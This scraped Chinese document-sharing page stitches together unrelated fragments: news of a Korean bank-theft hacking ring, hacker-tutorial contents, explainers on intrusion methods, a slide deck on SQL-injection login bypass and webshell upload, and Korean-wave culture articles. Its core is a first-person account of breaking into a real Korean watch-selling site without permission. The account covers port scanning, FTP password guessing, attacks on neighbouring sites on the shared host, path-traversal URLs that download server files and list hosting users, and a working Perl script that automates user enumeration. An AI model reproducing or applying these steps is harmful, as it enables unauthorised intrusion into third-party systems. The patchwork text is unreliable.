入侵韩国网站全过程

合集下载

入侵韩国网站盗窃韩国网民银行存款案点评

入侵韩国网站盗窃韩国网民银行存款案点评

入侵韩国网站盗窃韩国网民银行存款案点评
【案例】2013年,辽宁公安机关网安部门成功打掉一个非法入侵韩国网站盗窃韩国网民银行存款的特大团伙,共抓获犯罪嫌疑人34名,扣押涉案资金200余万元、车辆16台。

2013年1月,辽宁公安机关网安部门在工作中发现,网上有人发布“高价收购韩国银行资料”等信息。

经查,自2012年起,黑龙江网民王某龙(男,26岁,黑龙江人)纠集他人在辽宁丹东成立游戏工作室,通过互联网买卖韩国游戏币和韩国银行账户信息牟利,其贩卖的韩国游戏币主要来自王某(男,31岁,贵州人)、孙某(男,27岁,黑龙江人)犯罪团伙。

进一步调查发现,王某,孙某犯罪团伙自2012年起从事盗窃韩国网民银行存款犯罪活动。

其犯罪过程是:首先由王某联系黑客入侵韩国网站植入木马,当韩国网民浏览被入侵网站时,木马将自动植入网民使用的计算机,并窃取网民的网银账号和密码;然后,再由孙某登录受害人网银,将卡内存款直接转移至洗钱团伙提供的韩国银行卡并通过ATM 取现,或者购买游戏点卡、充值卡等方式变相提现。

据统计,仅半年时间,该犯罪团伙就先后对100余家韩国网站实施入侵,受到木马感染计算机达千余台,盗窃韩国网民银行账号密码4000余组,盗窃资金折合人民币1000余万元。

【点评】1、这类案例不仅仅发生在韩国,国内同类案件也频发。

2、网站的安全防护措施差给犯罪分子可乘之机。

3、个人计算机没有安装杀毒软件或没有及时更新杀毒软件的病毒库。

4、国内对虚拟装备或游戏的保护不尽完善。

5、跨地区作案,破案成本高,要加强国际合作,打击黑客类这案件。

从零开始学习黑客技术入门教程(基础)

从零开始学习黑客技术入门教程(基础)

最简单的黑客入门教程目录1 黑客简介 (2)2 保护自己电脑绝对不做黑客肉鸡 (2)3 抓肉鸡的几种方法 (5)4 防止黑客通过Explorer侵入系统 (9)5 SQL注入详解 (10)5.1 注入工具 (11)5.2 php+Mysql注入的误区 (11)5.3 简单的例子 (12)5.4 语句构造 (14)5.5 高级应用 (22)5.6 实例 (26)5.7 注入的防范 (29)5.8 我看暴库漏洞原理及规律1 (29)5.9 我看暴库漏洞原理及规律2 (32)6 跨站脚本攻击 (34)6.1 跨站脚本工具 (34)6.2 什么是XSS攻击 (35)6.3 如何寻找XSS漏洞 (35)6.4 寻找跨站漏洞 (36)6.5 如何利用 (36)6.6 XSS与其它技术的结合 (37)7 XPath注入 (38)7.1 XPath注入介绍 (38)7.2 XPath注入工具 (41)声明:文章来源大多是网上收集而来,版权归其原作者所有。

1黑客简介"黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。

关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。

但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。

有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。

他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。

而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。

网络入侵原理

网络入侵原理

网络入侵原理网络入侵是指未经授权的个人或组织,通过使用各种技术手段,违法地获取、篡改、删除存储在计算机系统中的信息的行为。

网络入侵者通常通过以下几种方式实施网络入侵:1. 操作系统漏洞利用:网络入侵者利用操作系统或软件的漏洞,通过攻击目标计算机的操作系统,成功地获取系统的控制权。

他们可以利用未修补的漏洞,执行恶意代码,篡改、删除或窃取计算机中的敏感信息。

2. 木马病毒:网络入侵者通过将恶意软件或病毒植入目标计算机的系统中,实现对该计算机的控制。

木马程序可以在用户不知情的情况下运行,远程操控计算机,窃取个人信息或拦截敏感数据。

3. 社交工程:网络入侵者通过诱使用户泄露个人信息或登录凭证,进而获取目标网络系统的访问权限。

他们可以冒充合法的用户或机构,发送钓鱼邮件、仿冒网站等手段,引诱用户点击链接、输入密码等。

4. 密码破解:网络入侵者利用计算机程序或工具对目标计算机系统中的用户密码进行不断尝试。

他们可以使用常见密码、字典攻击甚至暴力破解等方法,来获取用户的密码并越过系统身份验证。

5. SQL注入攻击:网络入侵者通过向网站或应用程序的数据库发送特殊的SQL命令,绕过正常的身份验证和授权过程,并成功获取或修改数据库中的信息。

这种攻击方式常针对未能正确过滤用户输入数据的网站或应用程序。

网络入侵的原理是基于利用计算机系统或软件的漏洞,突破系统的防御机制。

入侵者通常会不断探索目标系统的薄弱点,并运用各种方法来获取系统的控制权。

为了应对网络入侵威胁,个人和组织需要加强网络安全意识,采取有效的防护措施,如定期更新操作系统和软件补丁、使用强密码、安装防火墙和杀毒软件等。

同时,网络服务提供商和软件开发者也需要持续改善产品安全性,及时修复漏洞,为用户提供更加安全可靠的网络环境。

网络攻击入侵方式主要有几种

网络攻击入侵方式主要有几种

网络攻击入侵方式主要有几种网络安全是现在热门话题之一,我们如果操作设置不当就会受到网络攻击,而且方式多种,那么有哪些网络攻击方式呢?下面一起看看!常见的网络攻击方式端口扫描,安全漏洞攻击,口令入侵,木马程序,电子邮件攻击,Dos攻击1>.端口扫描:通过端口扫描可以知道被扫描计算机开放了哪些服务和端口,以便发现其弱点,可以手动扫描,也可以使用端口扫描软件扫描2>.端口扫描软件SuperScan(综合扫描器)主要功能:检测主机是否在线IP地址和主机名之间的相互转换通过TCP连接试探目标主机运行的服务扫描指定范围的主机端口。

PortScanner(图形化扫描器软件)比较快,但是功能较为单一X-Scan(无需安装绿色软件,支持中文)采用多线程方式对指定的IP地址段(或单机)进行安全漏洞检测支持插件功能,提供图形化和命令行操作方式,扫描较为综合。

3>.安全漏洞攻击安全漏洞是硬件、软件、协议在具体实现和安全策略上存在的缺陷,安全漏洞的存在可以使攻击者在未授权的情况下访问或破坏系统4>.口令入侵口令入侵是指非法获取某些合法用户的口令后,登录目标主机实施攻击的行为非法获取口令的方式:通过网络监听获取口令通过暴力解除获取口令利用管理失误获取口令5>.木马程序它隐藏在系统内部,随系统启动而启动,在用户不知情的情况下,连接并控制被感染计算机木马由两部分组成:服务器端和客户端常见木马程序:BO2000冰河灰鸽子6>.电子邮件攻击攻击者使用邮件炸弹软件或CGI程序向目的邮箱发送大量内容重复、无用的垃圾邮件,从而使目的邮箱被撑爆而无法使用电子邮件攻击的表现形式:邮件炸弹邮件欺骗7>.Dos攻击Dos全称为拒绝服务攻击,它通过短时间内向主机发送大量数据包,消耗主机资源,造成系统过载或系统瘫痪,拒绝正常用户访问拒绝服务攻击的类型:攻击者从伪造的、并不存在的IP地址发出连接请求攻击者占用所有可用的会话,阻止正常用户连接攻击者给接收方灌输大量错误或特殊结构的数据包Dos攻击举例泪滴攻击ping of Deathsmurf 攻击SYN溢出DDoS分布式拒绝服务攻击补充:校园网安全维护技巧校园网络分为内网和外网,就是说他们可以上学校的内网也可以同时上互联网,大学的学生平时要玩游戏购物,学校本身有自己的服务器需要维护;在大环境下,首先在校园网之间及其互联网接入处,需要设置防火墙设备,防止外部攻击,并且要经常更新抵御外来攻击;由于要保护校园网所有用户的安全,我们要安全加固,除了防火墙还要增加如ips,ids等防病毒入侵检测设备对外部数据进行分析检测,确保校园网的安全;外面做好防护措施,内部同样要做好防护措施,因为有的学生电脑可能带回家或者在外面感染,所以内部核心交换机上要设置vlan隔离,旁挂安全设备对端口进行检测防护;内网可能有ddos攻击或者arp病毒等传播,所以我们要对服务器或者电脑安装杀毒软件,特别是学校服务器系统等,安全正版安全软件,保护重要电脑的安全;对服务器本身我们要安全server版系统,经常修复漏洞及更新安全软件,普通电脑一般都是拨号上网,如果有异常上层设备监测一般不影响其他电脑。

站点入侵模拟演示

站点入侵模拟演示
博纳贤才 生生不息 关注安全 平台服务
存在XSS注入的URL
博纳贤才 生生不息 关注安全 平台服务
构造出来的XSS-URL
博纳贤才 生生不息 关注安全 平台服务
END Thank You !
博纳贤才 生生不息 关注安全 平台服务
博纳贤才 生生不息 关注安全 平台服务
站点入侵模拟演示
深圳市艾博生科技有限公司 2009
博纳贤才 生生不息 关注安全 平台服务
SQL
SQL注入 攻击者利用此注入漏洞问题,通过得到的 后台管理员帐号密码删除添加发表文章、 信息和修改管理配置,获取站点的webshell, 控制整个服务器危及整个网络系统。另外 可以利用漏洞完全控制整个数据库,执行 数据库的所有危险操作。
博纳贤才 生生不息 关注安全 平台服务
‘or’=‘or’绕过安全认证,密码任意
博纳贤才 生生不息 关注安全 平台服务
进入管理后台
博纳贤才 生生不息 关注安全 平台服务
进入新闻管理页面
博纳贤才 生生不息 关注安全 平台服务
添加新闻或业内资讯
博纳贤才 生生不息 关注安全 平台服务
上传木马,后辍改为.jpg
直接输入木马所在的URL访问
博纳贤才 生生不息 关注安全 平台服务
木马运行的页面
博纳贤才 生生不息 关注安全 平台服务
网站的页面代码
博纳贤才 生生不息 关注安全 平台服务
说明
现在已经获取到了网站的webshell,可以对 网站做任意操作,包括篡改挂马等
根据上传的木马不同,获得的webshell权限 是不同的,根据需要使用
修改备份文件路径
博纳贤才 生生不息 关注安全 平台服务
注意事项
当前数据库路径改为刚才上传木马文件的 路径 注意备份文件的存放路径 备份数据的名称,注意,这里要改成.asp的 文件,要不然那木马就不能运行了

韩流文化入侵现象分析

韩流文化入侵现象分析

关于“韩流”入侵中国的文化现象探析——以“韩剧”为案例在韩国政府大力推行对外文化输出政策的支持下, “韩流”作为一种文化现象, 迅速在中国崛起, 并对我国娱乐消费文化产生了强烈的影响。

“韩流”来袭与渗透, 不仅表达在中国当代流行音乐及其影视文化的发展上, 而且也渗透到人们的日常思维及其生活当中。

与此同时, “韩流”在中国的广泛传播和发展, 也对关系到国家的长治久安和社会主义事业的兴衰存亡的我国青少年的成长产生了一定的影响。

所谓“韩流”, 在中国是指韩国文化潮流的炽热传播现象。

中韩两国位置毗邻, 一衣带水, 自古以来两国就拥有相似的文化背景和历史渊源。

韩国作为一个深受儒家文化影响的国家, 在情感表达、价值观念和思维方式等很多方面和中国都有着深刻的相似性, 因此韩国的文化产品与西方相比也就更容易引起中国人的共鸣, 并被广泛的接受和传播。

此外, 韩剧剧情设计新颖、人物包装清新亮丽、画面真实唯美也给予了中国观众耳目一新的感觉。

其中往往在保留其传统文化内敛、含蓄的同时又将西方思想观念中的前卫和开放融入其中, 完全顺应了年轻一代的审美要求和理想。

不仅如此, 其剧情中渗透的追求和信念也被表达地淋漓尽致。

“韩国风骨十国际表情—情感的表现方式和伦理道德观念都是韩国的或者东方的, 如孝道、忠实、诚信、义气、宽恕、珍惜等等, 都是电视剧要竭力表达的价值观, 但是那种浪漫的调子、快捷的节奏以及洋派的氛围却是国际的。

”除历史因素及韩剧本身的特性外, 韩国文化的迅速崛起及广泛普及很大程度上还得益于韩国政府的高度重视和积极推进。

韩国外交通商部曾提出韩国在中国的文化商品市场中至少要占有10%份额的目标, 在世界市场上的份额, 由1%增加到5%, 而且要成为世界五大文化产业强国之一, 而最终目标就是要把韩国建设成为21世纪的文化大国和知识经济的强国。

为此韩国政府一直以来都在积极推进文化产业的发展, 他们希望借助“韩流”更广泛地进军国际文化商品市场, 使“韩流”成为促进其产品出口及推动贸易发展的桥梁。

娱乐美联英语 韩国女主播入侵中国 大尺度内容土豪狂砸钱

娱乐美联英语 韩国女主播入侵中国 大尺度内容土豪狂砸钱

小编给你一个美联英语官方免费试听课申请链接:/test/waijiao.aspx?tid=16-73675-0美联英语提供:娱乐英语韩国女主播入侵中国大尺度内容土豪狂砸钱Imagine there's a place where someone can go and sit down for an intimate chat with a gorgeous South Korean beauty; a place where even a simple cheap gift will cause her to blush with praise for the gift-giver. Does this sound appealing to you?假设有这么一个地方,你可以坐下来和一位高颜值的韩国美女随意攀谈,甚至一个便宜简单的礼物就会让其夸赞送礼物的人。

这听起来是不是相当有诱惑力?Maybe yes, maybe no. However, some people certainly find this type of place appealing, as online "live streaming chat rooms" are becoming all the rage on the Internet in China.可能是,也可能不是。

不过,随着网络“直播间”在中国互联网上爆红,的确有一些人认为这种地方非常有吸引力。

These virtual rooms are heaven for many men who live their lives online and a rising industry worth some 10 billion yuan ($1.5 billion) to businessman, but it is also a cruel battlefield where appearance, dance performances and even skill at video games can decide which hostess can rise to the top of the heap.对网友来说,这一虚拟的房间是天堂;对生意人来说,它是一个价值超过100亿元(15亿美元)的新兴行业;但这里也像是一个残酷的战场,容貌、舞姿、声音,甚至游戏水平,都能决定哪位主播能冠绝群芳。

韩日网战非一日之寒

韩日网战非一日之寒

中国国防报/2010年/3月/9日/第024版焦点新闻此类网络攻防每年都在两国网民之间上演韩日网战非一日之寒章名岂林奇据国外媒体报道,韩国和日本网民日前爆发大规模的网络冲突。

在双方网民的激烈对攻之下,两国境内的一批知名网站纷纷宕机、中断服务。

分析认为,尽管此次两国网民对战模式主要为“群殴”,技术含量并不高,但从中依然可以看出两国打造网络战力拥有比较丰厚的社会储备。

事实上,韩日两国目前都已组建了专门的网络战部队。

美女选手成导火索据国外媒体报道,3月1日下午,韩国网民率先对日本大型社交网站“2ch”网站发起网络攻击,掀起了两国网民对攻的序幕。

韩国媒体称,这次网络攻防源于日本网民对韩国不敬。

2月19日,一名在俄罗斯的韩国留学生被俄罗斯光头党杀害。

不料,这起在韩国备受谴责的事件却引起“2ch”网站日本网民的一片喝彩,有日本网民发帖声称“韩国佬该死”。

在本届温哥华冬奥会上,日本选手浅田真央和韩国选手金妍儿是争夺花样滑冰女子单人滑金牌的两大热门选手,“2ch”的网民在比赛前大喝倒彩说“失败肥”、“回到你的星球上去”。

此后,在花样滑冰女子单人滑的比赛中,韩国选手金妍儿力克目本选手浅田真央。

日本部分网民对此不满,并在“2ch”网站上发帖认为金妍儿之所以获胜可能是因为“贿赂裁判”。

韩国网民认为,日本网民的这些言论严重冒犯了韩国的民族感情。

就这样,两位冬奥会美女选手不幸成为引爆这场网战的导火索。

据韩联社报道,在精心组织和安排下,最终大约有1.2万名韩国网民参加了这起“对日网战”。

冲锋的号角于3月1日下午1时吹响,大批韩国网民进入“2ch”网站,以不断刷新页面的方式将所有留言板点击瘫痪,同时有韩国黑客开始攻击该网站的服务器,迫使“2ch”网站服务器宕机。

此后,虽然“2ch”网站的管理员查封了所有来自韩国的IP地址,但是网站服务器依然无法重新启动。

即使网站管理者企图使用代理服务器重启,也被韩国网民迅速发现,并再次遭遇攻击,“2ch”网站被彻底封锁,持续9小时无法提供服务。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

朋友是一个哈韩族,老给我推荐一些韩国出产的一些工艺品,呵呵,说真的,老韩的一些工业品还是不错的,特别是服装挺时尚的,俺女朋友就曾经买过两件,哈哈,穿起来挺漂亮的,最近俺朋友又给我推荐了一个卖手表的网站,直接打开如图1所示,手表看起来不错哦,跟劳力士得一拼哦!韩国是美国的小弟,俺是安全爱好者,看到网站就想看看该网站的安全做的如何,当我浏览网站产品时,如果要查看详细情况时,都会自动跳转到登录页面。

如图2所示,仅仅查看而已,都要登录,有这个必要吗?到底它网站的安全性如何呢?一、信息收集1.获取IP 地址首先打开DOS 窗口,然后使用“ping ”获取该网站的真实IP 地址,如图3所示,通过ping 命令知道该主机应该采取了一些安全措施,丢包率比较高,应该是禁止进行ping 等命令。

2.使用superscan 探测端口请出俺的扫描工具——superscan ,使用supersan3.0扫了一下IP 地址为“XX.XX.85.96”的端口开放情况,如图4所示,发现只开了21,22,80端口,从端口开放情况来看,对外提供服务仅仅21和80端口,感觉安全应该还可以,只能从Web 和Ftp 来入手。

3.Ftp口令扫描使用一些Ftp口令扫描工具对该IP地址扫描,使用了多个字典进行扫描,均未成功,看来Ftp口令扫描攻击方法不行。

说明:一般站点都会开放Ftp服务,Ftp服务主要用来上传程序等,一般默认会设置在Web目录,因此一旦获取了Ftp口令,就可以跟用户一样“正常”使用Ftp来上传和下载Web程序,通过上传Webshell或者获取数据库等方式来进行渗透和控制。

二、检查SQL注入攻击点1.寻找注入点先手动对该网站地址进行SQL注入点的检测,在地址后加入“’”、“or”等,例如在地址栏中分别输入:/g oods/content.asp?big=3&middle=12&small=1&num=30967’后回车,在地址栏中会自动变成“/goods/content.asp?big=3&middle=12&small=1&num= 30967%20and%201=1”,如图5所示,虽然手动检测结果提示为SQL错误,当后面使用一些脚本测试,没有找到明显的SQL注入点,使用HDSI等工具进行探测的结果也显示无注入点,说明暂时找不到注入点。

2.寻找上传地址通过是使用Flashget以及digshell挖掘鸡等工具对该网站进行上传地址搜索和检查,在/other/contact_us.asp这个页面找到一个上传,但不能上传asp、asa等可以提升权限的文件类型。

3.旁注信息搜集既然正面不能突破,那么就从侧面,通过旁注来看看可否获取该网站的Webshell。

打开/ 输入后发现同一服务器下一共有226个站,如图6所示。

说明:/ 是一个通过IP地址或者域名来获取该IP地址或者域名所在服务器中所存在的其它网站地址。

它是一个旁注的辅助工具,当然在明小子Domain3.5以及其它一些工具软件中也有这个功能。

既然在该IP地址上有226个网站,那就从其它网站入手吧。

4.尝试对其它站点进行渗透对剩下的225个网站随机进行SQL注入点探测,随机选中一个网站“”,从中找到一个可上传的地方,可以直接上传文件,将本地的一个Webshell文件上传到该站点,上传文件成功后,asp木马却无法运行,如图7所示。

看来该站点无法找到突破点,那就选择下一个网站进行探测吧。

后面我对多个站点进行了SQL注入探测和寻找文件上传地址。

通过探测虽然很多网站存在注入点,但都是public权限,无法备份得shell;即使成功进入后台后,有上传的地方,上传后还是没有运行脚本的权限。

说明管理员对该主机采取了严格的基于网站用户角色的安全权限策略,安全设置比较变态,对每个可上传的目录做了限制,仅对已知文件脚本类型运行,而禁止对其它脚本运行,各个网站之间安全先对独立。

三、获取突破点1.任意下载文件在我即将要放弃安全测试时,在打开/bbs/contents.asp?schoption=&schword=&page=1&idx= 164&bid=used01页面时,发现可以有下载的地方,而下载的参数就是一个文件,如果没有做限制的话,那就可以下载任何文件!如图8所示。

2.获取上传文件地址通过测试发现该上传页面可以上传任何文件,而在对另一网站注入时,也得到了网站的绝对路径(F:\HOME\HANSINCAR\WWW\HELPDESK\../board/inc/view.asp ),如图9所示。

3.推测网站绝对路径通过观察,可以知道在该服务器上每个网站的绝对路径就是“F:\用户名\WWW\”,于是可以构造一个地址下载网站中的源程序:/bbs/filedown.asp?filename=../../../../rolexcopy/www/goods/submain.asp说明:(1)打算下载/goods/submain.asp 文件(这里说明一下,因为down 默认检查文件名的目录是DEXTUpload/editor/中,查看图片的属性就知道了,所以要"../../"返回网站的根目录),但发现却无法下载,如图10所示。

(2)分析不能下载原因难道真的做了限制,还是权限问题?还是其它, 网站肯定存在上传漏洞,更换一个网站进行测试:/bbs/filedown.asp?filename=../../../../hansincar/www/board/inc/view.asp发现可以下载,如图11所示。

但为什么不能下载 网站中的文件呢,该网站中的submain.asp 是存在的,那只有一种可能——用户名XXX 不存在。

(3)获取网站的真正用户名怎么找到此网站的用户名呢?一个好的办法就是通过网站域名注册信息来获取用户的网站用户名,通过 来获取 网站域名注册信息,如图12所示。

(4)下载仍然失败于是尝试将原来的用户名更换为“tmdgus022”和“tmdgus”,进行测试:/bbs/filedown.asp?filename=../../../../tmdgus022/ www/goods/submain.asp/bbs/filedown.asp?filename=../../../../tmdgus/www /goods/submain.asp测试结果都显示找不到文件,看来通过该方法仍然无法下载源文件。

四、新的转机1.动手构建获取网站用户名的程序现在的问题就是要找到网站对应的用户名。

在某一网站后台,发现有可以列目录。

却跳不出该网站的根目录(在根目录时,“../”是不可点击),不可点击,那可以构造URL跳出,于是先看点击返回上一级目录时跳转到的URL,于是找到处理该JS的代码,如下:列出了当前网站的根目录,如图13所示。

2.获取根目录用户名称如果要返回到F:\home就要构造URL:/admin/inc/pop_directory.asp?FormName=all&f_location =../../&last=ok因为网站的根目录在F:\home\***\www下,发现还是pop_directory.asp的文件还是在网站的根目录下,难道说不能跳出?再仔细看了下“../../”不是刚好返回到网站根目录吗,因为pop_directory.asp文件在F:\home\***\www\admin\inc\目录下,于是重新构造URL/admin/inc/pop_directory.asp?FormName=all&f_location =../../../../&last=ok终于跳到F:\home目录中了,全部的用户名都出来了,如图14所示。

3.动手编写find.pl脚本自动获取用户下面的工作就简单了,就是一个个文件夹点进去,看那个是目录目标网站(/),然后就再构造URL下载就行了,但200多个站,一个个看,那不是很累?于是想出来偷懒的方法,写个脚本来自己找吧,先把网站全部用户复制下来,保存到user.txt文件中,再分析目标站点登录界面源代码,发现网站admin/image目录下有个admin_bk.gif文件,将其作为识别特征,也就是说只要我列出每个admin/image目录中目录下发现有admin_bk.gif文件,说明就可能是目标网站了。

Find.pl的脚本源代码如下:use LWP;use HTTP::Cookies;use HTTP::Request::Common qw(POST);my $ua=new LWP::UserAgent;$ua->agent('Mozilla/5.0');$ua->cookie_jar(new HTTP::Cookies);open(FILE,"user.txt") || die ("Could not open file");my @arr=;for my $line (@arr) {chomp $line;any($line);}sub any {print "分析$_[0]\n";my$url="/admin/inc/pop_directory.asp?FormName=all&Inpu tName=ji_AbsFolder&f_location=../../../../$_[0]/www/admin/image&r_loc ation=../../../../&r_folder=$_[0]/www/admin/image&l_folder=admin&last =";my ($content, $status, $is_success) = do_GET($url);if ($content =~ m/pop_directory.asp/) {next;}elsif ($content =~ m/admin_bk.gif/){ok($_[0]);}}sub do_GET {$browser = LWP::UserAgent->new unless $browser;my $resp = $browser->get(@_);return ($resp->content, $resp->status_line,$resp->is_success, $resp)if wantarray;return unless$resp->is_success;return $resp->content;}sub ok{open(FILE1,">>e:/perl/0k.txt") || die ("Could not open file");print FILE1 "$_[0]\r\n";close(FILE1);}在本地运行一下find.pl,等待一分钟左右再打开ok.txt,在该文件中发现有多个用户名注意:如果选好过滤的文件为admin_bk.gif,就不会出现那么多用户名了。

相关文档
最新文档